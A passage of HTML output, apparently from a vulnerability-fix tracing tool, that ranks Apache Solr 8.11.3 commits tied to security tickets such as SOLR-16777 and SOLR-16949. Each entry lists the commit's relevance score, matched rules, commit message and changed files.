      +
    • + +
    • +
      The commit modifies code containing relevant filename or methods: Solr
      +
    • + +
    • +
      The commit changes some relevant files: solr/core/src/java/org/apache/solr/handler/designer/SchemaDesignerConfigSetHelper.java
      +
    • + +
    • +
      The bug tracking ticket SOLR-16777 contains some security-related terms: unsafe, secure, security, insecure, malicious
      +
    • + +
    • +
      The commit message contains some security-related keywords: malicious
      +
    • + +
    • +
      An advisory keyword is contained in the changed files: handler
      +
    • + +
    • +
      The commit message references some bug tracking ticket: SOLR-16777
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      SOLR-16777: Fix for Schema Designer blindly trusting potentially malicious configsets
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + solr/core/src/java/org/apache/solr/handler/designer/SchemaDesignerConfigSetHelper.java + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + SOLR-16777: Schema Designer now correctly manages trust of the... + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 92 +
    + +
    +
    +
    + + Tag: releases/lucene-solr/8.11.3 +
    +
    +
    +
    +
    + + + + COMMIT_IS_SECURITY_RELEVANT + + XREF_BUG + + CHANGES_RELEVANT_CODE + + CHANGES_RELEVANT_FILES + + SEC_KEYWORDS_IN_LINKED_BUG + + ADV_KEYWORDS_IN_FILES + + COMMIT_HAS_TWINS + + BUG_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + 6e9ed203b30958396bdfd41760d426b386646865 +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      +
    • + +
    • +
      The commit and the advisory (including referenced pages) mention the same bug tracking ticket: SOLR-16777
      +
    • + +
    • +
      The commit modifies code containing relevant filename or methods: ZooKeeper, Solr
      +
    • + +
    • +
      The commit changes some relevant files: solr/core/src/java/org/apache/solr/handler/designer/SchemaDesignerAPI.java, solr/core/src/java/org/apache/solr/handler/designer/SchemaDesignerConfigSetHelper.java, solr/core/src/java/org/apache/solr/handler/designer/SchemaDesignerSettingsDAO.java, solr/core/src/java/org/apache/solr/handler/admin/ConfigSetsHandler.java
      +
    • + +
    • +
      The bug tracking ticket SOLR-16777 contains some security-related terms: unsafe, secure, security, insecure, malicious
      +
    • + +
    • +
      An advisory keyword is contained in the changed files: handler
      +
    • + +
    • +
      This commit has one or more twins.
      +
    • + +
    • +
      The commit message references some bug tracking ticket: SOLR-16777
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      SOLR-16777: Schema Designer now correctly manages trust of the ConfigSets it is managing Co-authored-by: Houston Putman <houston@apache.org>
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + solr/core/src/java/org/apache/solr/handler/admin/ConfigSetsHandler.java + + solr/core/src/java/org/apache/solr/handler/designer/SchemaDesignerAPI.java + + solr/core/src/java/org/apache/solr/handler/designer/SchemaDesignerConfigSetHelper.java + + solr/core/src/java/org/apache/solr/handler/designer/SchemaDesignerSettingsDAO.java + +
    • +
    + + +
    Commit twins
    + + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + SOLR-16949: Fix inputstream leaks + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 90 +
    + +
    +
    +
    + + Tag: releases/lucene-solr/8.11.3 +
    +
    +
    +
    +
    + + + + COMMIT_IS_SECURITY_RELEVANT + + XREF_BUG + + CHANGES_RELEVANT_CODE + + CHANGES_RELEVANT_FILES + + SEC_KEYWORDS_IN_LINKED_BUG + + ADV_KEYWORDS_IN_MSG + + BUG_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + 6c8f24eb9e3fe1cb19058173f2e221de3febfeda +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      +
    • + +
    • +
      The commit and the advisory (including referenced pages) mention the same bug tracking ticket: SOLR-16949
      +
    • + +
    • +
      The commit modifies code containing relevant filename or methods: Solr
      +
    • + +
    • +
      The commit changes some relevant files: solr/core/src/java/org/apache/solr/util/FileTypeMagicUtil.java
      +
    • + +
    • +
      The bug tracking ticket SOLR-16949 contains some security-related terms: hardening, security, vulnerable, rce
      +
    • + +
    • +
      The commit message and the advisory description contain the following keywords: stream
      +
    • + +
    • +
      The commit message references some bug tracking ticket: SOLR-16949
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      SOLR-16949: Fix inputstream leaks
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + solr/core/src/java/org/apache/solr/util/FileTypeMagicUtil.java + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + SOLR-16949: Restrict certain file types from being uploaded to or... + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 90 +
    + +
    +
    +
    + + Tag: releases/lucene-solr/8.11.3 +
    +
    +
    +
    +
    + + + + COMMIT_IS_SECURITY_RELEVANT + + XREF_BUG + + CHANGES_RELEVANT_CODE + + CHANGES_RELEVANT_FILES + + SEC_KEYWORDS_IN_LINKED_BUG + + ADV_KEYWORDS_IN_FILES + + BUG_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + 7e9a2e67f812032a049836c3aa0b18bf5cd717f9 +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      +
    • + +
    • +
      The commit and the advisory (including referenced pages) mention the same bug tracking ticket: SOLR-16949
      +
    • + +
    • +
      The commit modifies code containing relevant filename or methods: ZooKeeper, Solr
      +
    • + +
    • +
      The commit changes some relevant files: solr/core/ivy.xml, solr/core/src/java/org/apache/solr/util/SolrCLI.java, solr/solrj/src/java/org/apache/solr/common/cloud/ZkMaintenanceUtils.java, solr/core/src/resources/magic/executables, solr/core/src/java/org/apache/solr/core/backup/BackupManager.java, solr/core/src/test-files/magic/HelloWorldJavaClass.class.bin, solr/core/src/test-files/magic/hello.tar.bin, solr/licenses/simplemagic-1.17.jar.sha1, solr/core/src/java/org/apache/solr/util/FileTypeMagicUtil.java, solr/core/src/java/org/apache/solr/handler/admin/ConfigSetsHandler.java
      +
    • + +
    • +
      The bug tracking ticket SOLR-16949 contains some security-related terms: hardening, security, vulnerable, rce
      +
    • + +
    • +
      An advisory keyword is contained in the changed files: version, handler
      +
    • + +
    • +
      The commit message references some bug tracking ticket: SOLR-16949
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      SOLR-16949: Restrict certain file types from being uploaded to or downloaded from Config Sets
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + lucene/ivy-versions.properties + + solr/core/ivy.xml + + solr/core/src/java/org/apache/solr/core/backup/BackupManager.java + + solr/core/src/java/org/apache/solr/handler/admin/ConfigSetsHandler.java + + solr/core/src/java/org/apache/solr/util/FileTypeMagicUtil.java + + solr/core/src/java/org/apache/solr/util/SolrCLI.java + + solr/core/src/resources/magic/executables + + solr/core/src/test-files/magic/HelloWorldJavaClass.class.bin + + solr/core/src/test-files/magic/hello.tar.bin + + solr/licenses/simplemagic-1.17.jar.sha1 + + solr/solrj/src/java/org/apache/solr/common/cloud/ZkMaintenanceUtils.java + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + SOLR-14853: enableRemoteStreaming and enableStreamBody are now... + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 64 +
    + +
    +
    +
    + + Tag: releases/lucene-solr/8.11.3 +
    +
    +
    +
    +
    + + + + CHANGES_RELEVANT_CODE + + CHANGES_RELEVANT_FILES + + SEC_KEYWORDS_IN_LINKED_BUG + + ADV_KEYWORDS_IN_MSG + + ADV_KEYWORDS_IN_FILES + + BUG_IN_MESSAGE + + GITHUB_ISSUE_IN_MESSAGE + + COMMIT_IS_SECURITY_RELEVANT + + +
    +
    +
    +
    + + + + +
    +
    +
    + 6e2272c4ccc3513d452a4f6bf6dc9c37a344e71c +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      The commit modifies code containing relevant filename or methods: Solr
      +
    • + +
    • +
      The commit changes some relevant files: solr/core/src/test-files/solr/collection1/conf/solrconfig-analytics-query.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig-schemaless.xml, solr/core/src/java/org/apache/solr/servlet/SolrRequestParsers.java, solr/core/src/test-files/solr/collection1/conf/solrconfig-hash.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig-repeater.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig_perf.xml, solr/core/src/java/org/apache/solr/handler/DumpRequestHandler.java, solr/core/src/test-files/solr/collection1/conf/solrconfig-leader.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig-leader3.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig-doctransformers.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig-nocache.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig-leader1.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig-follower1.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig-managed-schema.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig-leader-throttled.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig-sql.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig-minhash.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig-plugcollector.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig-elevate.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig-leader2.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig-delaying-component.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig-tlog.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig-collapseqparser.xml, solr/core/src/java/org/apache/solr/core/SolrConfig.java, solr/core/src/test-files/solr/collection1/conf/solrconfig-replication-legacy.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig-follower.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig-leader1-keepOneBackup.xml, solr/core/src/test-files/solr/crazy-path-to-config.xml, solr/core/src/test-files/solr/collection1/conf/solrconfig-components-name.xml
      +
    • + +
    • +
      The bug tracking ticket SOLR-14853 contains some security-related terms: security
      +
    • + +
    • +
      The commit message and the advisory description contain the following keywords: streaming, stream, user
      +
    • + +
    • +
      An advisory keyword is contained in the changed files: handler, request
      +
    • + +
    • +
      The commit message references some bug tracking ticket: SOLR-14853
      +
    • + +
    • +
      The commit message references some github issue: 1615
      +
    • + +
    • +
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      SOLR-14853: enableRemoteStreaming and enableStreamBody are now global (#1615) Env vars: SOLR_ENABLE_REMOTE_STREAMING and SOLR_ENABLE_STREAM_BODY Sys props: solr.enableRemoteStreaming and solr.enableStreamBody solrconfig.xml (including via config-edit API) are now no-op; log a warning. Backwards incompatible but easy to comply. Co-authored-by: Jan Høydahl <janhoy@users.noreply.github.com> --------- Signed-off-by: Jan Høydahl <janhoy@users.noreply.github.com> Co-authored-by: Jan Høydahl <janhoy@users.noreply.github.com>
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + solr/core/src/java/org/apache/solr/core/SolrConfig.java + + solr/core/src/java/org/apache/solr/handler/DumpRequestHandler.java + + solr/core/src/java/org/apache/solr/servlet/SolrRequestParsers.java + + solr/core/src/test-files/solr/collection1/conf/solrconfig-analytics-query.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-collapseqparser.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-components-name.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-delaying-component.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-doctransformers.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-elevate.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-follower.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-follower1.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-hash.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-leader-throttled.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-leader.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-leader1-keepOneBackup.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-leader1.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-leader2.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-leader3.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-managed-schema.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-minhash.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-nocache.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-plugcollector.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-repeater.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-replication-legacy.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-schemaless.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-sql.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig-tlog.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig.xml + + solr/core/src/test-files/solr/collection1/conf/solrconfig_perf.xml + + solr/core/src/test-files/solr/crazy-path-to-config.xml + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + SOLR-17098: Fix some test issues + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 58 +
    + +
    +
    +
    + + Tag: releases/lucene-solr/8.11.3 +
    +
    +
    +
    +
    + + + + XREF_BUG + + CHANGES_RELEVANT_CODE + + CHANGES_RELEVANT_FILES + + SEC_KEYWORDS_IN_LINKED_BUG + + ADV_KEYWORDS_IN_MSG + + BUG_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + f13b6738b5b8888023dc760801b9436ee30429c5 +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      The commit and the advisory (including referenced pages) mention the same bug tracking ticket: SOLR-17098
      +
    • + +
    • +
      The commit modifies code containing relevant filename or methods: Solr, zkHost
      +
    • + +
    • +
      The commit changes some relevant files: solr/solrj/src/java/org/apache/solr/client/solrj/io/SolrClientCache.java, solr/solrj/src/test-files/solrj/solr/solr.xml
      +
    • + +
    • +
      The bug tracking ticket SOLR-17098 contains some security-related terms: security
      +
    • + +
    • +
      The commit message and the advisory description contain the following keywords: issue
      +
    • + +
    • +
      The commit message references some bug tracking ticket: SOLR-17098
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      SOLR-17098: Fix some test issues
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + solr/solrj/src/java/org/apache/solr/client/solrj/io/SolrClientCache.java + + solr/solrj/src/test-files/solrj/solr/solr.xml + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + SOLR-16949: Tolerate null bytes / empty file + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 46 +
    + +
    +
    +
    + + Tag: releases/lucene-solr/8.11.3 +
    +
    +
    +
    +
    + + + + XREF_BUG + + CHANGES_RELEVANT_FILES + + SEC_KEYWORDS_IN_LINKED_BUG + + BUG_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + 143fa6f09ac1679c690cd1657c81f87ba7f449b9 +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      The commit and the advisory (including referenced pages) mention the same bug tracking ticket: SOLR-16949
      +
    • + +
    • +
      The commit changes some relevant files: solr/core/src/java/org/apache/solr/util/FileTypeMagicUtil.java
      +
    • + +
    • +
      The bug tracking ticket SOLR-16949 contains some security-related terms: hardening, security, vulnerable, rce
      +
    • + +
    • +
      The commit message references some bug tracking ticket: SOLR-16949
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      SOLR-16949: Tolerate null bytes / empty file
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + solr/core/src/java/org/apache/solr/util/FileTypeMagicUtil.java + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + Revert "SOLR-15694, SOLR-15715: Node roles and dedicated query... + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 30 +
    + +
    +
    +
    + + Tag: releases/lucene-solr/8.11.3 +
    +
    +
    +
    +
    + + + + RELEVANT_WORDS_IN_MESSAGE + + CHANGES_RELEVANT_CODE + + CHANGES_RELEVANT_FILES + + ADV_KEYWORDS_IN_FILES + + BUG_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + 68fa493b8f959788216eb48f6bcef825fe8e24e6 +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      The commit message contains some relevant words: This
      +
    • + +
    • +
      The commit modifies code containing relevant filename or methods: This, ZooKeeper, SolrCloud, Solr
      +
    • + +
    • +
      The commit changes some relevant files: solr/core/src/java/org/apache/solr/cloud/api/collections/RoutedAlias.java, solr/core/src/java/org/apache/solr/cloud/api/collections/Assign.java, solr/core/src/java/org/apache/solr/request/SimpleFacets.java, solr/core/src/test-files/solr/configsets/conf3/conf/schema.xml, solr/core/src/java/org/apache/solr/handler/ClusterAPI.java, solr/core/src/java/org/apache/solr/search/join/ScoreJoinQParserPlugin.java, solr/core/src/java/org/apache/solr/cloud/api/collections/CategoryRoutedAlias.java, solr/core/src/java/org/apache/solr/handler/RequestHandlerBase.java, solr/core/src/java/org/apache/solr/core/CoreContainer.java, solr/solrj/src/java/org/apache/solr/common/cloud/ZkStateReader.java, solr/core/src/java/org/apache/solr/servlet/CoordinatorHttpSolrCall.java, solr/contrib/ltr/src/java/org/apache/solr/ltr/search/LTRQParserPlugin.java, solr/contrib/ltr/src/java/org/apache/solr/ltr/response/transform/LTRFeatureLoggerTransformerFactory.java, solr/solrj/src/java/org/apache/solr/client/solrj/impl/BaseCloudSolrClient.java, solr/core/src/java/org/apache/solr/update/processor/DistributedUpdateProcessorFactory.java, solr/core/src/java/org/apache/solr/cloud/api/collections/TimeRoutedAlias.java, solr/core/src/java/org/apache/solr/handler/admin/ShowFileRequestHandler.java, solr/core/src/java/org/apache/solr/request/DelegatingSolrQueryRequest.java, solr/core/src/java/org/apache/solr/response/transform/CoreAugmenterFactory.java, solr/core/src/java/org/apache/solr/handler/component/HttpShardHandler.java, solr/core/src/java/org/apache/solr/response/transform/TransformerFactory.java, solr/core/src/java/org/apache/solr/search/JoinQParserPlugin.java, solr/core/src/java/org/apache/solr/update/processor/RoutedAliasUpdateProcessor.java, solr/core/src/java/org/apache/solr/cloud/api/collections/RestoreCmd.java, solr/core/src/java/org/apache/solr/servlet/SolrDispatchFilter.java, solr/solrj/src/java/org/apache/solr/client/solrj/SolrRequest.java, solr/core/src/java/org/apache/solr/request/SolrQueryRequest.java, solr/core/src/test-files/solr/configsets/cache-control/conf/schema.xml, solr/core/src/java/org/apache/solr/servlet/HttpSolrCall.java, solr/core/src/java/org/apache/solr/handler/component/HttpShardHandlerFactory.java, solr/core/src/java/org/apache/solr/handler/component/RealTimeGetComponent.java, solr/core/src/test-files/solr/configsets/cache-control/conf/solrconfig.xml, solr/test-framework/src/java/org/apache/solr/SolrTestCaseJ4.java, solr/core/src/java/org/apache/solr/handler/SolrConfigHandler.java, solr/contrib/analytics/src/java/org/apache/solr/handler/component/AnalyticsComponent.java, solr/core/src/java/org/apache/solr/handler/component/SearchHandler.java, solr/core/src/java/org/apache/solr/core/NodeRoles.java, solr/core/src/java/org/apache/solr/update/UpdateLog.java, solr/core/src/java/org/apache/solr/cloud/api/collections/CreateCollectionCmd.java, solr/core/src/test-files/solr/configsets/conf3/conf/solrconfig.xml, solr/core/src/java/org/apache/solr/handler/component/QueryComponent.java, solr/core/src/java/org/apache/solr/api/CoordinatorV2HttpSolrCall.java
      +
    • + +
    • +
      An advisory keyword is contained in the changed files: handler, read, request, actor, clouds
      +
    • + +
    • +
      The commit message references some bug tracking ticket: SOLR-15694, SOLR-15715
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      Revert "SOLR-15694, SOLR-15715: Node roles and dedicated query coordinator nodes" This reverts commit 2088d743db9304492ab19c14bc80c6187f172b79.
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + solr/contrib/analytics/src/java/org/apache/solr/handler/component/AnalyticsComponent.java + + solr/contrib/ltr/src/java/org/apache/solr/ltr/response/transform/LTRFeatureLoggerTransformerFactory.java + + solr/contrib/ltr/src/java/org/apache/solr/ltr/search/LTRQParserPlugin.java + + solr/core/src/java/org/apache/solr/api/CoordinatorV2HttpSolrCall.java + + solr/core/src/java/org/apache/solr/cloud/api/collections/Assign.java + + solr/core/src/java/org/apache/solr/cloud/api/collections/CategoryRoutedAlias.java + + solr/core/src/java/org/apache/solr/cloud/api/collections/CreateCollectionCmd.java + + solr/core/src/java/org/apache/solr/cloud/api/collections/RestoreCmd.java + + solr/core/src/java/org/apache/solr/cloud/api/collections/RoutedAlias.java + + solr/core/src/java/org/apache/solr/cloud/api/collections/TimeRoutedAlias.java + + solr/core/src/java/org/apache/solr/core/CoreContainer.java + + solr/core/src/java/org/apache/solr/core/NodeRoles.java + + solr/core/src/java/org/apache/solr/handler/ClusterAPI.java + + solr/core/src/java/org/apache/solr/handler/RequestHandlerBase.java + + solr/core/src/java/org/apache/solr/handler/SolrConfigHandler.java + + solr/core/src/java/org/apache/solr/handler/admin/ShowFileRequestHandler.java + + solr/core/src/java/org/apache/solr/handler/component/HttpShardHandler.java + + solr/core/src/java/org/apache/solr/handler/component/HttpShardHandlerFactory.java + + solr/core/src/java/org/apache/solr/handler/component/QueryComponent.java + + solr/core/src/java/org/apache/solr/handler/component/RealTimeGetComponent.java + + solr/core/src/java/org/apache/solr/handler/component/SearchHandler.java + + solr/core/src/java/org/apache/solr/request/DelegatingSolrQueryRequest.java + + solr/core/src/java/org/apache/solr/request/SimpleFacets.java + + solr/core/src/java/org/apache/solr/request/SolrQueryRequest.java + + solr/core/src/java/org/apache/solr/response/transform/CoreAugmenterFactory.java + + solr/core/src/java/org/apache/solr/response/transform/TransformerFactory.java + + solr/core/src/java/org/apache/solr/search/JoinQParserPlugin.java + + solr/core/src/java/org/apache/solr/search/join/ScoreJoinQParserPlugin.java + + solr/core/src/java/org/apache/solr/servlet/CoordinatorHttpSolrCall.java + + solr/core/src/java/org/apache/solr/servlet/HttpSolrCall.java + + solr/core/src/java/org/apache/solr/servlet/SolrDispatchFilter.java + + solr/core/src/java/org/apache/solr/update/UpdateLog.java + + solr/core/src/java/org/apache/solr/update/processor/DistributedUpdateProcessorFactory.java + + solr/core/src/java/org/apache/solr/update/processor/RoutedAliasUpdateProcessor.java + + solr/core/src/test-files/solr/configsets/cache-control/conf/schema.xml + + solr/core/src/test-files/solr/configsets/cache-control/conf/solrconfig.xml + + solr/core/src/test-files/solr/configsets/conf3/conf/schema.xml + + solr/core/src/test-files/solr/configsets/conf3/conf/solrconfig.xml + + solr/solrj/src/java/org/apache/solr/client/solrj/SolrRequest.java + + solr/solrj/src/java/org/apache/solr/client/solrj/impl/BaseCloudSolrClient.java + + solr/solrj/src/java/org/apache/solr/common/cloud/ZkStateReader.java + + solr/test-framework/src/java/org/apache/solr/SolrTestCaseJ4.java + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + SOLR-17034: Hitting /solr// ends up with HttpSolrCall NPE when using... + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 28 +
    + +
    +
    +
    + + Tag: releases/lucene-solr/8.11.3 +
    +
    +
    +
    +
    + + + + RELEVANT_WORDS_IN_MESSAGE + + CHANGES_RELEVANT_CODE + + CHANGES_RELEVANT_FILES + + BUG_IN_MESSAGE + + GITHUB_ISSUE_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + f33d102f254909492b6f5d5a2142dfea791a5a4a +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      The commit message contains some relevant words: Solr
      +
    • + +
    • +
      The commit modifies code containing relevant filename or methods: Solr
      +
    • + +
    • +
      The commit changes some relevant files: solr/core/src/java/org/apache/solr/servlet/HttpSolrCall.java
      +
    • + +
    • +
      The commit message references some bug tracking ticket: SOLR-17034
      +
    • + +
    • +
      The commit message references some github issue: 2020
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      SOLR-17034: Hitting /solr// ends up with HttpSolrCall NPE when using Solr Cloud (#2020)
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + solr/core/src/java/org/apache/solr/servlet/HttpSolrCall.java + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + SOLR-16781: <lib ../> directive disabled by default + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 26 +
    + +
    +
    +
    + + Tag: +
    +
    +
    +
    +
    + + + + CHANGES_RELEVANT_CODE + + CHANGES_RELEVANT_FILES + + SEC_KEYWORDS_IN_LINKED_BUG + + ADV_KEYWORDS_IN_FILES + + BUG_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + 9118b3f3d8a2b62258e68bbf1c904fbc0ee58b61 +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      The commit modifies code containing relevant filename or methods: This, Solr
      +
    • + +
    • +
      The commit changes some relevant files: solr/solr-ref-guide/src/configsets-api.adoc, solr/core/src/java/org/apache/solr/core/SolrConfig.java, solr/server/solr/configsets/_default/conf/solrconfig.xml, solr/solr-ref-guide/src/libs.adoc
      +
    • + +
    • +
      The bug tracking ticket SOLR-16781 contains some security-related terms: secure, security, rce
      +
    • + +
    • +
      An advisory keyword is contained in the changed files: server
      +
    • + +
    • +
      The commit message references some bug tracking ticket: SOLR-16781
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      SOLR-16781: <lib ../> directive disabled by default
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + solr/core/src/java/org/apache/solr/core/SolrConfig.java + + solr/server/solr/configsets/_default/conf/solrconfig.xml + + solr/solr-ref-guide/src/configsets-api.adoc + + solr/solr-ref-guide/src/libs.adoc + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + Revert "SOLR-15694, 15715: Create ephemeral roles properly (missed... + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 26 +
    + +
    +
    +
    + + Tag: releases/lucene-solr/8.11.3 +
    +
    +
    +
    +
    + + + + RELEVANT_WORDS_IN_MESSAGE + + CHANGES_RELEVANT_CODE + + CHANGES_RELEVANT_FILES + + BUG_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + 002b3ce67bea7dfe114c3b7dfdceb00b8777363c +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      The commit message contains some relevant words: This
      +
    • + +
    • +
      The commit modifies code containing relevant filename or methods: ZooKeeper, Solr, ACLs
      +
    • + +
    • +
      The commit changes some relevant files: solr/core/src/java/org/apache/solr/cloud/ZkController.java
      +
    • + +
    • +
      The commit message references some bug tracking ticket: SOLR-15694
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      Revert "SOLR-15694, 15715: Create ephemeral roles properly (missed backporting these changes last time)" This reverts commit b54a788fe71c7f87a8b8564461cb196c138fc7ce.
      +
    • +
    + +
    Changed files in commit
    + +
      +
    • + + solr/core/src/java/org/apache/solr/cloud/ZkController.java + +
    • +
    + + + +
    +
    +
    + +
    + +
    +
    +
    +
    +
    + SOLR-16580: Avoid making copies of DocCollection for PRS updates + +
    +
    +
    + +
    +
    + +
    +
    +
    +
    + +
    + + Relevance: 26 +
    + +
    +
    +
    + + Tag: releases/lucene-solr/8.11.3 +
    +
    +
    +
    +
    + + + + CHANGES_RELEVANT_CODE + + CHANGES_RELEVANT_FILES + + SEC_KEYWORDS_IN_LINKED_BUG + + ADV_KEYWORDS_IN_FILES + + BUG_IN_MESSAGE + + +
    +
    +
    +
    + + + + +
    +
    +
    + a639d267fd395f8ed0f9b1d1e2fd4f852dc3eefd +
    +
    + + + + Open commit + +
    +
    Matched rules
    + +
      + +
    • +
      The commit modifies code containing relevant filename or methods: Solr
      +
    • + +
    • +
      The commit changes some relevant files: solr/core/src/java/org/apache/solr/handler/admin/CollectionsHandler.java, solr/solrj/src/java/org/apache/solr/common/cloud/Slice.java, solr/solrj/src/java/org/apache/solr/common/cloud/ZkStateReader.java, solr/solrj/src/java/org/apache/solr/client/solrj/impl/BaseHttpClusterStateProvider.java, solr/solrj/src/java/org/apache/solr/common/cloud/DocCollection.java, solr/core/src/java/org/apache/solr/cloud/Overseer.java, solr/core/src/java/org/apache/solr/handler/admin/ClusterStatus.java, solr/core/src/java/org/apache/solr/cloud/overseer/ClusterStateMutator.java, solr/core/src/java/org/apache/solr/cloud/autoscaling/sim/SnapshotClusterStateProvider.java, solr/core/src/java/org/apache/solr/cloud/RefreshCollectionMessage.java, solr/core/src/java/org/apache/solr/cloud/overseer/ZkStateWriter.java, solr/core/src/java/org/apache/solr/cloud/overseer/CollectionMutator.java, solr/solrj/src/java/org/apache/solr/client/solrj/cloud/DistribStateManager.java, solr/solrj/src/java/org/apache/solr/common/cloud/ClusterState.java, solr/solrj/src/java/org/apache/solr/common/cloud/Replica.java, solr/solrj/src/java/org/apache/solr/common/cloud/PerReplicaStates.java, solr/solrj/src/java/org/apache/solr/common/cloud/PerReplicaStatesOps.java
      +
    • + +
    • +
      The bug tracking ticket SOLR-16580 contains some security-related terms: security
      +
    • + +
    • +
      An advisory keyword is contained in the changed files: handler, read, provide
      +
    • + +
    • +
      The commit message references some bug tracking ticket: SOLR-16580
      +
    • + +
    + +
    Commit message
    + +
      +
    • +
      SOLR-16580: Avoid making copies of DocCollection for PRS updates
      +
    • +
    + +
    Changed files in commit
    + +
      +
